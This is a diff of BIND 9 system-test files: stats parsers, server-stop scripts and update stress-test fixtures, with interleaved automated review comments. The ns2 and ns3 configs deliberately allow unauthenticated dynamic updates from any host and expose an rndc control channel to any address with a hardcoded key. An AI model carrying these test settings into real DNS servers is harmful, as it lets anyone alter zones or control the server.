+my $tcpsent = $ref->{traffic}->{"dns-tcp-responses-sizes-sent-ipv4"};
+my $type = "tcp response-size ";
+foreach $key (keys %{$tcpsent}) {
+ print $type . $key . ": ". $tcpsent->{$key} ."\n";
+}
+
+my $udprcvd = $ref->{traffic}->{"dns-udp-requests-sizes-received-ipv4"};
+my $type = "udp request-size ";
+foreach $key (keys %{$udprcvd}) {
+ print $type . $key . ": ". $udprcvd->{$key} ."\n";
+}
+
+my $udpsent = $ref->{traffic}->{"dns-udp-responses-sizes-sent-ipv4"};
+my $type = "udp response-size ";
+foreach $key (keys %{$udpsent}) {
+ print $type . $key . ": ". $udpsent->{$key} ."\n";
+}
diff --git a/bin/tests/system/statschannel/traffic-xml.pl b/bin/tests/system/statschannel/traffic-xml.pl
new file mode 100644
index 0000000..5552cc5
--- /dev/null
+++ b/bin/tests/system/statschannel/traffic-xml.pl
@@ -0,0 +1,46 @@
+#!/usr/bin/perl
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+# traffic-xml.pl:
+# Parses the XML version of the RSSAC002 traffic stats into a
+# normalized format.
+
+use XML::Simple;
+
+my $file = $ARGV[0];
+
+my $ref = XMLin($file);
+
+my $udp = $ref->{traffic}->{ipv4}->{udp}->{counters};
+foreach $group (@$udp) {
+ my $type = "udp " . $group->{type} . " ";
+ if (exists $group->{counter}->{name}) {
+ print $type . $group->{counter}->{name} . ": " . $group->{counter}->{content} . "\n";
+ } else {
+ foreach $key (keys %{$group->{counter}}) {
+ print $type . $key . ": ". $group->{counter}->{$key}->{content} ."\n";
+ }
+ }
+}
+
+my $tcp = $ref->{traffic}->{ipv4}->{tcp}->{counters};
+foreach $group (@$tcp) {
+ my $type = "tcp " . $group->{type} . " ";
+ if (exists $group->{counter}->{name}) {
+ print $type . $group->{counter}->{name} . ": " . $group->{counter}->{content} . "\n";
+ } else {
+ foreach $key (keys %{$group->{counter}}) {
+ print $type . $key . ": ". $group->{counter}->{$key}->{content} ."\n";
+ }
+ }
+}
diff --git a/bin/tests/system/statschannel/traffic.expect.1 b/bin/tests/system/statschannel/traffic.expect.1
new file mode 100644
index 0000000..5938d5d
--- /dev/null
+++ b/bin/tests/system/statschannel/traffic.expect.1
@@ -0,0 +1,2 @@
+tcp request-size 16-31: 1
+tcp response-size 64-79: 1
diff --git a/bin/tests/system/statschannel/traffic.expect.2 b/bin/tests/system/statschannel/traffic.expect.2
new file mode 100644
index 0000000..6c9e25a
--- /dev/null
+++ b/bin/tests/system/statschannel/traffic.expect.2
@@ -0,0 +1,4 @@
+tcp request-size 16-31: 1
+tcp response-size 64-79: 1
+udp request-size 48-63: 1
+udp response-size 112-127: 1
diff --git a/bin/tests/system/statschannel/traffic.expect.4 b/bin/tests/system/statschannel/traffic.expect.4
new file mode 100644
index 0000000..3f892f5
--- /dev/null
+++ b/bin/tests/system/statschannel/traffic.expect.4
@@ -0,0 +1,5 @@
+tcp request-size 16-31: 1
+tcp response-size 64-79: 1
+udp request-size 48-63: 2
+udp response-size 112-127: 1
+udp response-size 848-863: 1
diff --git a/bin/tests/system/statschannel/traffic.expect.5 b/bin/tests/system/statschannel/traffic.expect.5
new file mode 100644
index 0000000..15911b1
--- /dev/null
+++ b/bin/tests/system/statschannel/traffic.expect.5
@@ -0,0 +1,7 @@
+tcp request-size 16-31: 1
+tcp request-size 48-63: 1
+tcp response-size 112-127: 1
+tcp response-size 64-79: 1
+udp request-size 48-63: 2
+udp response-size 112-127: 1
+udp response-size 848-863: 1
diff --git a/bin/tests/system/statschannel/traffic.expect.6 b/bin/tests/system/statschannel/traffic.expect.6
new file mode 100644
index 0000000..73fc8f1
--- /dev/null
+++ b/bin/tests/system/statschannel/traffic.expect.6
@@ -0,0 +1,8 @@
+tcp request-size 16-31: 1
+tcp request-size 48-63: 2
+tcp response-size 112-127: 1
+tcp response-size 64-79: 1
+tcp response-size 848-863: 1
+udp request-size 48-63: 2
+udp response-size 112-127: 1
+udp response-size 848-863: 1
diff --git a/bin/tests/system/statschannel/zones-json.pl b/bin/tests/system/statschannel/zones-json.pl
new file mode 100644
index 0000000..9eec9db
--- /dev/null
+++ b/bin/tests/system/statschannel/zones-json.pl
@@ -0,0 +1,37 @@ +#!/usr/bin/perl + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# zones-json.pl: +# Parses the JSON version of the dnssec sign stats for the +# "dnssec" zone in the default view into a normalized format. + +use JSON; + +my $file = $ARGV[0]; +my $zone = $ARGV[1]; +open(INPUT, "<$file"); +my $text = do{local$/;<INPUT>}; +close(INPUT); + +my $ref = decode_json($text); + +my $dnssecsign = $ref->{views}->{_default}->{zones}[$zone]->{"dnssec-sign"}; +my $type = "dnssec-sign operations "; +foreach $key (keys %{$dnssecsign}) { + print $type . $key . ": ". $dnssecsign->{$key} ."\n"; +} +my $dnssecrefresh = $ref->{views}->{_default}->{zones}[$zone]->{"dnssec-refresh"}; +my $type = "dnssec-refresh operations "; +foreach $key (keys %{$dnssecrefresh}) { + print $type . $key . ": ". $dnssecrefresh->{$key} ."\n"; +} diff --git a/bin/tests/system/statschannel/zones-xml.pl b/bin/tests/system/statschannel/zones-xml.pl new file mode 100644 index 0000000..be86852 --- /dev/null +++ b/bin/tests/system/statschannel/zones-xml.pl 
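Review bot: `open(INPUT, "<$file");` in zones-json.pl uses the two-argument form with a bareword handle and ignores the return value, so a missing or unreadable file leaves `$text` undefined and the failure only shows up later as a `decode_json` error. The two-argument form also folds the mode and the caller-supplied name into one string; `open(my $fh, '<', $file) or die "$file: $!\n";` with reads from `$fh` keeps the name as pure data and reports the real cause. `$zone` comes straight from `$ARGV[1]` and is used as an array index in `zones[$zone]`, so a check such as `die "usage: $0 file zone-index\n" unless defined $zone && $zone =~ /^\d+$/;` would reject a non-numeric argument instead of silently reading element 0. `my $type` is declared twice in the same scope, which would warn once `use warnings` is enabled; the second `my` should go.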
@@ -0,0 +1,40 @@ +#!/usr/bin/perl + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# zones-xml.pl: +# Parses the XML version of the dnssec sign stats for the +# "dnssec" zone in the default view into a normalized format. + +use XML::Simple; + +my $file = $ARGV[0]; +my $zone = $ARGV[1]; + +my $ref = XMLin($file); + +my $counters = $ref->{views}->{view}->{_default}->{zones}->{zone}->{$zone}->{counters}; + +foreach $group (@$counters) { + + my $type = $group->{type}; + + if ($type eq "dnssec-sign" || $type eq "dnssec-refresh") { + if (exists $group->{counter}->{name}) { + print $type . " operations " . $group->{counter}->{name} . ": " . $group->{counter}->{content} . "\n"; + } else { + foreach $key (keys %{$group->{counter}}) { + print $type . " operations " . $key . ": ". $group->{counter}->{$key}->{content} ."\n"; + } + } + } +} diff --git a/bin/tests/system/stop.pl b/bin/tests/system/stop.pl new file mode 100644 index 0000000..6783b85 --- /dev/null +++ b/bin/tests/system/stop.pl 
@@ -0,0 +1,292 @@ +#!/usr/bin/perl -w + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# Framework for stopping test servers +# Based on the type of server specified, signal the server to stop, wait +# briefly for it to die, and then kill it if it is still alive. +# If a server is specified, stop it. Otherwise, stop all servers for test. + +use strict; +use warnings; + +use Cwd ':DEFAULT', 'abs_path'; +use English '-no_match_vars'; +use Getopt::Long; + +# Usage: +# perl stop.pl [--use-rndc [--port port]] test [server] +# +# --use-rndc Attempt to stop the server via the "rndc stop" command. +# +# --port port Only relevant if --use-rndc is specified, this sets the +# command port over which the attempt should be made. If +# not specified, port 9953 is used. +# +# test Name of the test directory. +# +# server Name of the server directory. + +my $usage = "usage: $0 [--use-rndc [--halt] [--port port]] test-directory [server-directory]"; + +my $use_rndc = 0; +my $halt = 0; +my $rndc_port = 9953; +my $errors = 0; + +GetOptions( + 'use-rndc!' => \$use_rndc, + 'halt!' => \$halt, + 'port=i' => \$rndc_port + ) or die "$usage\n"; + +my ( $test, $server_arg ) = @ARGV; + +if (!$test) { + die "$usage\n"; +} + +# Global variables +my $topdir = abs_path($ENV{'SYSTEMTESTTOP'}); +my $testdir = abs_path($topdir . "/" . $test); + +if (! -d $testdir) { + die "No test directory: \"$testdir\"\n"; +} + +if ($server_arg && ! 
-d "$testdir/$server_arg") { + die "No server directory: \"$testdir/$server_arg\"\n"; +} + +my $RNDC = $ENV{RNDC}; + +my @ns; +my @ans; + +if ($server_arg) { + if ($server_arg =~ /^ns/) { + push(@ns, $server_arg); + } elsif ($server_arg =~ /^ans/) { + push(@ans, $server_arg); + } else { + print "$0: ns or ans directory expected"; + print "I:$test:failed"; + } +} else { + # Determine which servers need to be stopped for this test. + opendir DIR, $testdir or die "unable to read test directory: \"$test\" ($OS_ERROR)\n"; + my @files = sort readdir DIR; + closedir DIR; + + @ns = grep /^ns[0-9]*$/, @files; + @ans = grep /^ans[0-9]*$/, @files; +} + +# Stop the server(s), pass 1: rndc. +if ($use_rndc) { + foreach my $name(@ns) { + stop_rndc($name, $rndc_port); + } + + @ns = wait_for_servers(30, @ns); +} + +# Pass 2: SIGTERM +foreach my $name (@ns) { + stop_signal($name, "TERM"); +} + +@ns = wait_for_servers(60, @ns); + +foreach my $name(@ans) { + stop_signal($name, "TERM", 1); +} + +@ans = wait_for_servers(1200, @ans); + +# Pass 3: SIGABRT +foreach my $name (@ns) { + print "I:$test:$name didn't die when sent a SIGTERM\n"; + stop_signal($name, "ABRT"); + $errors = 1; +} +foreach my $name (@ans) { + print "I:$test:$name didn't die when sent a SIGTERM\n"; + stop_signal($name, "ABRT", 1); + $errors = 1; +} + +exit($errors); + +# Subroutines + +# Return the full path to a given server's lock file. +sub server_lock_file { + my ( $server ) = @_; + + return if (defined($ENV{'CYGWIN'}) && $ENV{'CYGWIN'}); + + return $testdir . "/" . $server . "/named.lock" if ($server =~ /^ns/); + return if ($server =~ /^ans/); + + die "Unknown server type $server\n"; +} + +# Return the full path to a given server's PID file. +sub server_pid_file { + my ( $server ) = @_; + + return $testdir . "/" . $server . "/named.pid" if ($server =~ /^ns/); + return $testdir . "/" . $server . "/ans.pid" if ($server =~ /^ans/); + + die "Unknown server type $server\n"; +} + +# Read a PID. 
+sub read_pid { + my ( $pid_file ) = @_; + + return unless -f $pid_file; + # we don't really care about the race condition here + my $result = open(my $fh, "<", $pid_file); + if (!defined($result)) { + print "I:$test:$pid_file: $!\n"; + unlink $pid_file; + return; + } + + my $pid = <$fh>; + return unless defined($pid); + + chomp($pid); + return $pid; +} + +# Stop a named process with rndc. +sub stop_rndc { + my ( $server, $port ) = @_; + my $n; + + if ($server =~ /^ns(\d+)/) { + $n = $1; + } else { + die "unable to parse server number from name \"$server\"\n"; + } + + my $ip = "10.53.0.$n"; + if (-e "$testdir/$server/named.ipv6-only") { + $ip = "fd92:7065:b8e:ffff::$n"; + } + + my $how = $halt ? "halt" : "stop"; + + # Ugly, but should work. + system("$RNDC -c ../common/rndc.conf -s $ip -p $port $how | sed 's/^/I:$test:$server /'"); + return; +} + +sub server_died { + my ( $server, $signal ) = @_; + + print "I:$test:$server died before a SIG$signal was sent\n"; + $errors = 1; + + my $pid_file = server_pid_file($server); + unlink($pid_file); + + return; +} + +sub send_signal { + my ( $signal, $pid, $ans ) = @_; + + if (! defined $ans) { + $ans = 0; + } + + my $result = 0; + + if (!$ans && ($^O eq 'cygwin' || $^O eq 'msys')) { + my $killout = `/bin/kill -f -$signal $pid 2>&1`; + chomp($killout); + $result = 1 if ($killout eq ''); + } else { + $result = kill $signal, $pid; + } + return $result; +} + +# Stop a server by sending a signal to it. +sub stop_signal { + my ( $server, $signal, $ans ) = @_; + if (! 
defined $ans) { + $ans = 0; + } + + my $pid_file = server_pid_file($server); + my $pid = read_pid($pid_file); + + return unless defined($pid); + + # Send signal to the server, and bail out if signal can't be sent + if (send_signal($signal, $pid, $ans) != 1) { + server_died($server, $signal); + return; + } + + return; +} + +sub pid_file_exists { + my ( $server ) = @_; + + my $pid_file = server_pid_file($server); + my $pid = read_pid($pid_file); + + return unless defined($pid); + + # If we're here, the PID file hasn't been cleaned up yet + if (send_signal(0, $pid) == 0) { + # XXX: on windows this is likely to result in a + # false positive, so don't bother reporting the error. + if (!defined($ENV{'CYGWIN'}) || !$ENV{'CYGWIN'}) { + print "I:$test:$server crashed on shutdown\n"; + $errors = 1; + } + return; + } + + return $server; +} + +sub lock_file_exists { + my ( $server ) = @_; + my $lock_file = server_lock_file($server); + + return unless defined($lock_file) && -f $lock_file; + + return $server; +} + +sub wait_for_servers { + my ( $timeout, @servers ) = @_; + + while ($timeout > 0 && @servers > 0) { + sleep 1 if (@servers > 0); + @servers = + grep { defined($_) } + map { pid_file_exists($_) || lock_file_exists($_) } @servers; + $timeout--; + } + + return @servers; +} diff --git a/bin/tests/system/stop.sh b/bin/tests/system/stop.sh new file mode 100755 index 0000000..d01ca1d --- /dev/null +++ b/bin/tests/system/stop.sh 
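Review bot: `read_pid` returns whatever the first line of the PID file holds, and that value reaches `kill $signal, $pid` and, on Cygwin/MSYS, the backtick command `/bin/kill -f -$signal $pid` in `send_signal` without any validation. An empty, zero, negative or non-numeric value would signal a process group or be interpreted by the shell, so `read_pid` should do `return unless $pid =~ /^[1-9][0-9]*$/;` before `return $pid;`. `stop_rndc` likewise interpolates `$RNDC`, `$test` and `$server` into a single `system()` shell pipeline (and `$test` into a sed expression), while `$server_arg` is only matched against the prefix patterns `/^ns/` and `/^ans/`; rejecting names that fail a strict pattern such as `/^[A-Za-z0-9_.-]+$/` right after `GetOptions` would keep both values inert, assuming test names never need other characters. The branch that prints "ns or ans directory expected" neither ends its messages with a newline nor sets `$errors`, so the script exits 0 on that path.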
@@ -0,0 +1,19 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP="$(cd -P -- "$(dirname -- "$0")" && pwd -P)" +# shellcheck source=conf.sh +. "$SYSTEMTESTTOP/conf.sh" +export SYSTEMTESTTOP + +$PERL "$SYSTEMTESTTOP/stop.pl" "$@" diff --git a/bin/tests/system/stopall.sh b/bin/tests/system/stopall.sh new file mode 100644 index 0000000..0d63ecf --- /dev/null +++ b/bin/tests/system/stopall.sh @@ -0,0 +1,24 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# +# Stop all hanging processes from any system tests. +# + +SYSTEMTESTTOP=. +. $SYSTEMTESTTOP/conf.sh + +for d in $SUBDIRS +do + $SHELL stop.sh $d +done diff --git a/bin/tests/system/stress/clean.sh b/bin/tests/system/stress/clean.sh new file mode 100644 index 0000000..4833fa7 --- /dev/null +++ b/bin/tests/system/stress/clean.sh 
@@ -0,0 +1,22 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f ns?/zone*.bk + +rm -f ns2/zone0*.db +rm -f ns2/zone0*.jnl +rm -f */named.memstats +rm -f ns*/named.lock +rm -f ns*/managed-keys.bind* +rm -f ns*/named.run +rm -f ns*/named.conf diff --git a/bin/tests/system/stress/ns2/named.conf.in b/bin/tests/system/stress/ns2/named.conf.in new file mode 100644 index 0000000..607e0b5 --- /dev/null +++ b/bin/tests/system/stress/ns2/named.conf.in 
@@ -0,0 +1,57 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +controls { /* empty */ }; + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; + dnssec-validation no; + notify yes; +}; + +zone "zone000000.example" { + type primary; + allow-update { any; }; + file "zone000000.example.db"; +}; + +zone "zone000001.example" { + type primary; + allow-update { any; }; + file "zone000001.example.db"; +}; + +zone "zone000002.example" { + type primary; + allow-update { any; }; + file "zone000002.example.db"; +}; + +zone "zone000003.example" { + type primary; + allow-update { any; }; + file "zone000003.example.db"; +}; + +zone "zone000004.example" { + type primary; + allow-update { any; }; + file "zone000004.example.db"; +}; diff --git a/bin/tests/system/stress/ns2/zone.template.db b/bin/tests/system/stress/ns2/zone.template.db new file mode 100644 index 0000000..7ca1cc3 --- /dev/null +++ b/bin/tests/system/stress/ns2/zone.template.db 
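Review bot: All five zones in stress/ns2/named.conf.in set `allow-update { any; };` with no comment, which accepts unauthenticated dynamic updates from any host that can reach 10.53.0.2 on the test port. For a stress test driven by unsigned updates this is presumably deliberate, but the setting travels with the file when a fixture is copied. A comment above the first zone, such as `/* test only: unauthenticated updates; server is bound to 10.53.0.2 */`, would record that. If the update client always sends from a 10.53.0.x address (not visible in this hunk), `allow-update { 10.53.0.0/24; };` would express the same intent with a narrower ACL.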
@@ -0,0 +1,21 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +@ IN SOA ns2 hostmaster 1 300 120 3600 86400 +@ NS ns2 + NS ns3 + NS ns4 +ns2 A 10.53.0.2 +ns3 A 10.53.0.3 +ns4 A 10.53.0.4 + +$GENERATE 0-999 name${0,6} A 10.0.0.1 diff --git a/bin/tests/system/stress/ns3/named.conf.in b/bin/tests/system/stress/ns3/named.conf.in new file mode 100644 index 0000000..7a568d6 --- /dev/null +++ b/bin/tests/system/stress/ns3/named.conf.in 
@@ -0,0 +1,74 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +controls { /* empty */ }; + +options { + query-source address 10.53.0.3; + notify-source 10.53.0.3; + transfer-source 10.53.0.3; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.3; }; + listen-on-v6 { none; }; + recursion yes; + dnssec-validation yes; + notify yes; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +server 10.53.0.4 { + provide-ixfr no; +}; + +server 10.53.0.2 { + request-ixfr no; +}; + +zone "zone000000.example" { + type secondary; + file "zone000000.example.bk"; + primaries { 10.53.0.2; }; +}; + +zone "zone000001.example" { + type secondary; + file "zone000001.example.bk"; + primaries { 10.53.0.2; }; +}; + +zone "zone000002.example" { + type secondary; + file "zone000002.example.bk"; + primaries { 10.53.0.2; }; +}; + +zone "zone000003.example" { + type secondary; + file "zone000003.example.bk"; + primaries { 10.53.0.2; }; +}; + +zone "zone000004.example" { + type secondary; + file "zone000004.example.bk"; + primaries { 10.53.0.2; }; +}; diff --git a/bin/tests/system/stress/ns4/named.conf.in b/bin/tests/system/stress/ns4/named.conf.in new file mode 100644 index 0000000..26296f5 --- /dev/null +++ b/bin/tests/system/stress/ns4/named.conf.in 
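Review bot: The control channel in stress/ns3/named.conf.in is opened with `allow { any; }` and protected only by the fixed secret `"1234abcd8765"` written in the file, so any host that can reach 10.53.0.3 on the control port and knows this published key can issue rndc commands. A comment on `key rndc_key` marking it as a test-only key that must never be reused outside the harness would make that explicit. Narrowing the ACL, for example `allow { 10.53.0.0/24; }`, is worth considering if the harness's rndc always connects from a 10.53.0.x address (to be confirmed against the caller). The file also opens with `controls { /* empty */ };` and later defines a second `controls` block; either a comment explaining why both are kept or removal of the empty one would avoid confusion about which applies.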
@@ -0,0 +1,57 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +controls { /* empty */ }; + +options { + query-source address 10.53.0.4; + notify-source 10.53.0.4; + transfer-source 10.53.0.4; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.4; }; + listen-on-v6 { none; }; + recursion yes; + dnssec-validation yes; + notify yes; +}; + +zone "zone000000.example" { + type secondary; + file "zone000000.example.bk"; + primaries { 10.53.0.3; }; +}; + +zone "zone000001.example" { + type secondary; + file "zone000001.example.bk"; + primaries { 10.53.0.3; }; +}; + +zone "zone000002.example" { + type secondary; + file "zone000002.example.bk"; + primaries { 10.53.0.3; }; +}; + +zone "zone000003.example" { + type secondary; + file "zone000003.example.bk"; + primaries { 10.53.0.3; }; +}; + +zone "zone000004.example" { + type secondary; + file "zone000004.example.bk"; + primaries { 10.53.0.3; }; +}; diff --git a/bin/tests/system/stress/prereq.sh b/bin/tests/system/stress/prereq.sh new file mode 100644 index 0000000..aa97ae2 --- /dev/null +++ b/bin/tests/system/stress/prereq.sh 
@@ -0,0 +1,31 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +if test -n "$PYTHON" +then + if $PYTHON -c "import dns" 2> /dev/null + then + : + else + echo_i "This test requires the dnspython module." >&2 + exit 1 + fi +else + echo_i "This test requires Python and the dnspython module." >&2 + exit 1 +fi + +exit 0 diff --git a/bin/tests/system/stress/setup.sh b/bin/tests/system/stress/setup.sh new file mode 100644 index 0000000..a19b4a1 --- /dev/null +++ b/bin/tests/system/stress/setup.sh @@ -0,0 +1,25 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# shellcheck source=conf.sh +. "$SYSTEMTESTTOP/conf.sh" + +cp ns2/zone.template.db ns2/zone000000.example.db +cp ns2/zone.template.db ns2/zone000001.example.db +cp ns2/zone.template.db ns2/zone000002.example.db +cp ns2/zone.template.db ns2/zone000003.example.db +cp ns2/zone.template.db ns2/zone000004.example.db + +copy_setports ns2/named.conf.in ns2/named.conf +copy_setports ns3/named.conf.in ns3/named.conf +copy_setports ns4/named.conf.in ns4/named.conf diff --git a/bin/tests/system/stress/tests_stress_update.py b/bin/tests/system/stress/tests_stress_update.py new file mode 100644 index 0000000..638cda0 
--- /dev/null
+++ b/bin/tests/system/stress/tests_stress_update.py
@@ -0,0 +1,77 @@ +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +import concurrent.futures +import os +import subprocess +import time +import dns.query +import dns.update + + +def rndc_loop(test_state, server): + rndc = os.getenv("RNDC") + port = os.getenv("CONTROLPORT") + + cmdline = [ + rndc, + "-c", + "../common/rndc.conf", + "-p", + port, + "-s", + server, + "reload", + ] + + while not test_state["finished"]: + subprocess.run(cmdline, check=False) + time.sleep(1) + + +def update_zone(test_state, zone, named_port): + server = "10.53.0.2" + for i in range(1000): + if test_state["finished"]: + return + update = dns.update.UpdateMessage(zone) + update.add(f"dynamic-{i}.{zone}", 300, "TXT", f"txt-{i}") + try: + response = dns.query.udp(update, server, 10, named_port) + assert response.rcode() == dns.rcode.NOERROR + except dns.exception.Timeout: + print(f"error: query timeout for {zone}") + + print(f"Update of {server} zone {zone} successful") + + +# If the test has run to completion without named crashing, it has succeeded. +def test_update_stress(named_port): + test_state = {"finished": False} + + with concurrent.futures.ThreadPoolExecutor() as executor: + executor.submit(rndc_loop, test_state, "10.53.0.3") + + updaters = [] + for i in range(5): + zone = f"zone00000{i}.example." + updaters.append(executor.submit(update_zone, test_state, zone, named_port)) + + # All the update_zone() tasks are expected to complete within 5 + # minutes. 
If they do not, we cannot assert immediately as that will + # cause the ThreadPoolExecutor context manager to wait indefinitely; + # instead, we first signal all tasks that it is time to exit and only + # check whether any task failed to finish within 5 minutes outside of + # the ThreadPoolExecutor context manager. + unfinished_tasks = concurrent.futures.wait(updaters, timeout=300).not_done + test_state["finished"] = True + + assert not unfinished_tasks diff --git a/bin/tests/system/stub/clean.sh b/bin/tests/system/stub/clean.sh new file mode 100644 index 0000000..504df03 --- /dev/null +++ b/bin/tests/system/stub/clean.sh @@ -0,0 +1,23 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# +# Clean up after stub tests. +# +rm -f dig.out.ns[35] ns3/child.example.st +rm -f */named.memstats +rm -f */named.conf +rm -f */named.run +rm -f ns*/named.lock +rm -f ns*/managed-keys.bind* +rm -f ns5/example.db diff --git a/bin/tests/system/stub/knowngood.dig.out.norec b/bin/tests/system/stub/knowngood.dig.out.norec new file mode 100644 index 0000000..ca0e458 --- /dev/null +++ b/bin/tests/system/stub/knowngood.dig.out.norec 
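Review bot: Exceptions raised inside the worker threads of `test_update_stress` are never observed, so the test can pass while its checks have failed. The `assert response.rcode() == dns.rcode.NOERROR` in `update_zone`, and any `TypeError` from `subprocess.run` in `rndc_loop` when `RNDC` or `CONTROLPORT` is unset, are stored in their futures; `concurrent.futures.wait` counts a failed future as done, and `assert not unfinished_tasks` still succeeds. After the `with` block, surface them with `for task in updaters: task.result()`, and keep the future returned by `executor.submit(rndc_loop, ...)` so its result can be checked the same way. `update_zone` also prints "successful" even when queries timed out, and it uses `dns.rcode` and `dns.exception` without importing them explicitly; `import dns.exception` and `import dns.rcode` would remove the reliance on transitive imports.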
